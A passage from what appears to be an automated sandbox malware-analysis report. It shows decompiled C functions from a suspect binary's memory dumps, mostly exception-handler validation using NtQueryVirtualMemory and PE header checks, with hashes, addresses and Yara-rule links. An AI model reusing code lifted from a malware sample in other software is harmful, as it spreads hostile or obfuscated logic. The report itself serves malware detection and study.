										_t69 = 0x151417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1514180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1514180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x15141c0 = 1;
							__eflags =  *0x15141c0;
							if( *0x15141c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1514180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x1514180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x15141c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x1514180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x1514178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x1514180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x1514180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x015123ff
0x01512402
0x01512408
0x01512426
0x00000000
0x01512426
0x01512410
0x01512419
0x0151241f
0x0151242e
0x01512431
0x01512434
0x0151243e
0x0151243e
0x01512440
0x01512443
0x01512445
0x01512445
0x01512447
0x0151244a
0x00000000
0x00000000
0x0151244c
0x0151244e
0x015124b4
0x015124b4
0x01512612
0x00000000
0x01512612
0x01512450
0x01512450
0x01512454
0x01512456
0x01512456
0x01512456
0x01512456
0x01512459
0x0151245a
0x0151245d
0x0151245d
0x01512461
0x01512465
0x01512473
0x01512473
0x0151247b
0x01512481
0x01512483
0x01512485
0x01512495
0x015124a2
0x015124a6
0x015124ab
0x015124ad
0x0151252b
0x0151252b
0x015124af
0x015124af
0x015124af
0x0151252d
0x0151252f
0x01512610
0x01512610
0x00000000
0x01512535
0x01512535
0x0151253c
0x00000000
0x00000000
0x01512542
0x01512546
0x015125a2
0x015125a4
0x015125ac
0x015125ae
0x015125b0
0x00000000
0x00000000
0x015125b2
0x015125b8
0x015125ba
0x015125bc
0x015125d1
0x015125d1
0x015125d3
0x01512602
0x01512609
0x00000000
0x01512609
0x015125d7
0x015125d8
0x015125da
0x015125dc
0x015125dc
0x015125de
0x015125e0
0x015125e2
0x015125f6
0x015125f6
0x015125f9
0x015125fb
0x015125fb
0x015125fc
0x015125fc
0x00000000
0x015125e4
0x015125e4
0x015125e4
0x015125ed
0x015125ee
0x015125f0
0x015125f2
0x015125f2
0x00000000
0x015125e4
0x015125e2
0x015125be
0x015125c5
0x015125c5
0x015125c7
0x00000000
0x00000000
0x015125c9
0x015125ca
0x015125cd
0x015125cf
0x00000000
0x00000000
0x00000000
0x015125cf
0x00000000
0x015125c5
0x01512548
0x0151254b
0x01512550
0x00000000
0x00000000
0x01512559
0x0151255b
0x01512561
0x00000000
0x00000000
0x01512567
0x0151256d
0x00000000
0x00000000
0x01512573
0x01512575
0x0151257e
0x01512582
0x00000000
0x00000000
0x01512588
0x0151258b
0x0151258d
0x00000000
0x00000000
0x01512594
0x01512596
0x00000000
0x00000000
0x01512598
0x0151259c
0x00000000
0x00000000
0x00000000
0x0151259c
0x00000000
0x00000000
0x00000000
0x01512487
0x01512487
0x01512487
0x0151248e
0x00000000
0x00000000
0x01512490
0x01512491
0x01512493
0x00000000
0x00000000
0x00000000
0x01512493
0x015124bb
0x015124bd
0x00000000
0x00000000
0x015124cd
0x015124cf
0x015124d1
0x00000000
0x00000000
0x015124d7
0x015124de
0x0151250a
0x0151250a
0x0151250c
0x0151250e
0x01512522
0x01512524
0x00000000
0x00000000
0x00000000
0x00000000
0x01512510
0x01512510
0x01512510
0x01512519
0x0151251a
0x0151251c
0x0151251e
0x0151251e
0x00000000
0x01512510
0x015124e0
0x015124e3
0x015124e5
0x015124f7
0x015124f7
0x015124fa
0x015124fc
0x015124fc
0x015124fd
0x015124fd
0x01512503
0x00000000
0x00000000
0x00000000
0x00000000
0x015124e7
0x015124e7
0x015124e7
0x015124ee
0x00000000
0x00000000
0x015124f0
0x015124f0
0x015124f1
0x00000000
0x00000000
0x00000000
0x015124f1
0x015124f3
0x015124f5
0x01512508
0x00000000
0x00000000
0x00000000
0x01512508
0x00000000
0x015124f5
0x01512467
0x0151246a
0x0151246d
0x00000000
0x00000000
0x0151246f
0x01512471
0x00000000
0x00000000
0x00000000
0x01512471
0x01512436
0x01512438
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 015124A6

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: b4c9fc79a4c963566f6f826ead38053397db630932b681edb51c23e1f0227b74
Instruction ID: 14641e0b9553d1bb2849ef1c81a4e3b86f547ffe7c04da1f578a5fa85aeda42d
Opcode Fuzzy Hash: b4c9fc79a4c963566f6f826ead38053397db630932b681edb51c23e1f0227b74
Instruction Fuzzy Hash: D961BC307406169FFB2BCB2DD8E062937A5FB95354F3A8829D952CF28DE770D8828650

Uniqueness

Uniqueness Score: -1.00%

Function 02F6B2FD, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F6B2FD(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x2f6d2d8; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x2f6d320 = 1;
										__eflags =  *0x2f6d320;
										if( *0x2f6d320 != 0) {
											goto L60;
										}
										_t84 =  *0x2f6d2d8; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x2f6d320 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x2f6d2d8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x2f6d2e0 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x2f6d2dc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x2f6d320 = 1;
							__eflags =  *0x2f6d320;
							if( *0x2f6d320 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x2f6d320 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x2f6d2e0 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x2f6d2d8 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x2f6d2e0 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x02f6b307
0x02f6b30a
0x02f6b310
0x02f6b32e
0x00000000
0x02f6b32e
0x02f6b318
0x02f6b321
0x02f6b327
0x02f6b336
0x02f6b339
0x02f6b33c
0x02f6b346
0x02f6b346
0x02f6b348
0x02f6b34b
0x02f6b34d
0x02f6b34d
0x02f6b34f
0x02f6b352
0x00000000
0x00000000
0x02f6b354
0x02f6b356
0x02f6b3bc
0x02f6b3bc
0x02f6b51a
0x00000000
0x02f6b51a
0x02f6b358
0x02f6b358
0x02f6b35c
0x02f6b35e
0x02f6b35e
0x02f6b35e
0x02f6b35e
0x02f6b361
0x02f6b362
0x02f6b365
0x02f6b365
0x02f6b369
0x02f6b36d
0x02f6b37b
0x02f6b37b
0x02f6b383
0x02f6b389
0x02f6b38b
0x02f6b38d
0x02f6b39d
0x02f6b3aa
0x02f6b3ae
0x02f6b3b3
0x02f6b3b5
0x02f6b433
0x02f6b433
0x02f6b3b7
0x02f6b3b7
0x02f6b3b7
0x02f6b435
0x02f6b437
0x02f6b518
0x02f6b518
0x00000000
0x02f6b43d
0x02f6b43d
0x02f6b444
0x00000000
0x00000000
0x02f6b44a
0x02f6b44e
0x02f6b4aa
0x02f6b4ac
0x02f6b4b4
0x02f6b4b6
0x02f6b4b8
0x00000000
0x00000000
0x02f6b4ba
0x02f6b4c0
0x02f6b4c2
0x02f6b4c4
0x02f6b4d9
0x02f6b4d9
0x02f6b4db
0x02f6b50a
0x02f6b511
0x00000000
0x02f6b511
0x02f6b4df
0x02f6b4e0
0x02f6b4e2
0x02f6b4e4
0x02f6b4e4
0x02f6b4e6
0x02f6b4e8
0x02f6b4ea
0x02f6b4fe
0x02f6b4fe
0x02f6b501
0x02f6b503
0x02f6b503
0x02f6b504
0x02f6b504
0x00000000
0x02f6b4ec
0x02f6b4ec
0x02f6b4ec
0x02f6b4f5
0x02f6b4f6
0x02f6b4f8
0x02f6b4fa
0x02f6b4fa
0x00000000
0x02f6b4ec
0x02f6b4ea
0x02f6b4c6
0x02f6b4cd
0x02f6b4cd
0x02f6b4cf
0x00000000
0x00000000
0x02f6b4d1
0x02f6b4d2
0x02f6b4d5
0x02f6b4d7
0x00000000
0x00000000
0x00000000
0x02f6b4d7
0x00000000
0x02f6b4cd
0x02f6b450
0x02f6b453
0x02f6b458
0x00000000
0x00000000
0x02f6b461
0x02f6b463
0x02f6b469
0x00000000
0x00000000
0x02f6b46f
0x02f6b475
0x00000000
0x00000000
0x02f6b47b
0x02f6b47d
0x02f6b486
0x02f6b48a
0x00000000
0x00000000
0x02f6b490
0x02f6b493
0x02f6b495
0x00000000
0x00000000
0x02f6b49c
0x02f6b49e
0x00000000
0x00000000
0x02f6b4a0
0x02f6b4a4
0x00000000
0x00000000
0x00000000
0x02f6b4a4
0x00000000
0x00000000
0x00000000
0x02f6b38f
0x02f6b38f
0x02f6b38f
0x02f6b396
0x00000000
0x00000000
0x02f6b398
0x02f6b399
0x02f6b39b
0x00000000
0x00000000
0x00000000
0x02f6b39b
0x02f6b3c3
0x02f6b3c5
0x00000000
0x00000000
0x02f6b3d5
0x02f6b3d7
0x02f6b3d9
0x00000000
0x00000000
0x02f6b3df
0x02f6b3e6
0x02f6b412
0x02f6b412
0x02f6b414
0x02f6b416
0x02f6b42a
0x02f6b42c
0x00000000
0x00000000
0x00000000
0x00000000
0x02f6b418
0x02f6b418
0x02f6b418
0x02f6b421
0x02f6b422
0x02f6b424
0x02f6b426
0x02f6b426
0x00000000
0x02f6b418
0x02f6b3e8
0x02f6b3e8
0x02f6b3eb
0x02f6b3ed
0x02f6b3ff
0x02f6b3ff
0x02f6b402
0x02f6b404
0x02f6b404
0x02f6b405
0x02f6b405
0x02f6b40b
0x02f6b40b
0x00000000
0x00000000
0x00000000
0x00000000
0x02f6b3ef
0x02f6b3ef
0x02f6b3ef
0x02f6b3f6
0x00000000
0x00000000
0x02f6b3f8
0x02f6b3f8
0x02f6b3f9
0x00000000
0x00000000
0x00000000
0x02f6b3f9
0x02f6b3fb
0x02f6b3fd
0x02f6b410
0x00000000
0x00000000
0x00000000
0x02f6b410
0x00000000
0x02f6b3fd
0x02f6b36f
0x02f6b372
0x02f6b375
0x00000000
0x00000000
0x02f6b377
0x02f6b379
0x00000000
0x00000000
0x00000000
0x02f6b379
0x02f6b33e
0x02f6b340
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02F6B3AE

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: cc716f9629122e8c3838a19f4aedef76691066d94d1eaf59325d60c57d43569b
Instruction ID: 9c42b34312142ebc93e89d141ed3e1949cb16e4b225f7740e306ba34ea9b3c04
Opcode Fuzzy Hash: cc716f9629122e8c3838a19f4aedef76691066d94d1eaf59325d60c57d43569b
Instruction Fuzzy Hash: 3561E131F002068FCB29CE29C99D77973A6EB853DCF288529DB16E7698E730D842C750

Uniqueness

Uniqueness Score: -1.00%

Function 100037DC, Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eef83fe1bdb0cc61cb8cf8870c47491ceda76362f7c4e7e912b1030ae2ea742d
Instruction ID: f03515b711a1094222a3f48b9ad79fa7286fd41fb861612bc21685542e7cd3d9
Opcode Fuzzy Hash: eef83fe1bdb0cc61cb8cf8870c47491ceda76362f7c4e7e912b1030ae2ea742d
Instruction Fuzzy Hash: 8C519FD0468B067EBFD255344C070C7ABD6E9833957A27585C8A38A92B811C6E23F7E7

Uniqueness

Uniqueness Score: -1.00%

Function 10007896, Relevance: .2, Instructions: 231
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E10007896() {
				signed char _t10;
				void* _t11;
				void* _t15;

				L0:
				while(1) {
					L0:
					asm("enter 0x492e, 0xb9");
					L1:
					asm("popfd");
					asm("rol dword [edx+0x689a39ec], cl");
					_t11 = _t11 + 1;
					asm("rol byte [ecx+edx*2+0xf], 1");
					asm("out 0xe0, al");
					asm("movsd");
					_push(_t15);
					asm("invalid");
					L2:
					asm("aas");
					asm("out 0xa3, al");
					asm("cld");
					_t15 = _t15 - 1;
					asm("rcr byte [edi], 1");
					asm("in al, dx");
					 *(_t10 + 0x21384d0d) =  *(_t10 + 0x21384d0d) & _t10;
					asm("les edx, [edx]");
					asm("outsb");
					asm("retf");
					_t7 = _t10;
					_t10 =  *0x4D417935;
					 *((intOrPtr*)(0x4d417935)) = _t7;
				}
			}

0x10007896
0x10007896
0x10007896
0x10007896
0x1000785f
0x1000785f
0x10007860
0x10007866
0x10007867
0x1000786b
0x1000786d
0x10007874
0x10007875
0x10007876
0x10007876
0x1000787c
0x1000787e
0x1000787f
0x10007881
0x10007883
0x10007884
0x1000788a
0x1000788c
0x1000788f
0x10007890
0x10007890
0x10007890
0x10007893

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09dd2d3036caff4518ff070c3ce54fc91206857f671360ee8a9bf8b76d8ab42
Instruction ID: 15cc3357d39c29e4c6023c27fc783f19e757f5364375075022090afbea0257ff
Opcode Fuzzy Hash: a09dd2d3036caff4518ff070c3ce54fc91206857f671360ee8a9bf8b76d8ab42
Instruction Fuzzy Hash: 524199729447A68FDB12CF38C8955D9BFF0FF972A435446ADC4818F612E32A8517CB81

Uniqueness

Uniqueness Score: -1.00%

Function 100012F1, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.460026556.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.460008405.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.460052961.0000000010033000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.460064901.000000001003A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b0f3bc29999d1272d8bcbf1465dbdb25a72cb67ab9ac76e367848031992d32
Instruction ID: 5221eebfaf37f88a96dc2e35b91762797a334dbcfc01fd841a81a81f0fb9dcfa
Opcode Fuzzy Hash: 16b0f3bc29999d1272d8bcbf1465dbdb25a72cb67ab9ac76e367848031992d32
Instruction Fuzzy Hash: D84111A18157A17FFBD29A34480B1CB7BD0ED13394B61349EC5924B923E612C503FF92

Uniqueness

Uniqueness Score: -1.00%

Function 0122B5D0, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.456939571.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction ID: b6cc0bb249b8f4a7dba363f6e3bb6ce40e9c4eade2f35e3759615674a47cf18e
Opcode Fuzzy Hash: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction Fuzzy Hash: FC313E70A2012AEFDB64CF48C1946BDBBB2FF44311F648159D906AB391D3749E81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 015121D4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E015121D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0151233B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E015123F5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E015122E0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0151233B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E015123D7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x015121d8
0x015121d9
0x015121da
0x015121dd
0x015121df
0x015121e2
0x015121e3
0x015121e5
0x015121e6
0x015121e7
0x015121ea
0x015121f4
0x015122a5
0x015122ac
0x015122b5
0x015121fa
0x015121fa
0x01512200
0x01512206
0x01512209
0x0151220c
0x01512210
0x01512215
0x0151221a
0x0151229a
0x00000000
0x0151221c
0x0151221c
0x01512228
0x0151222a
0x01512285
0x01512285
0x0151228b
0x00000000
0x0151222c
0x0151223b
0x0151223d
0x0151223e
0x0151223f
0x01512242
0x01512242
0x01512244
0x00000000
0x01512246
0x01512246
0x01512290
0x01512248
0x01512248
0x0151224c
0x01512254
0x01512259
0x0151225e
0x0151226a
0x01512272
0x01512279
0x0151227f
0x01512283
0x00000000
0x01512283
0x01512246
0x01512244
0x00000000
0x0151222a
0x0151229e
0x0151229e
0x0151229e
0x0151221a
0x015122ba
0x015122c1

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: e849890fc6d8eaa91290e33df7d58376443cb340702335a171f33f3f3aa68dee
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: B021B6729002059BEB15DF68C8809AFBBA5FF88350F568568D9259F249D730FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02F6B0DC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E02F6B0DC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
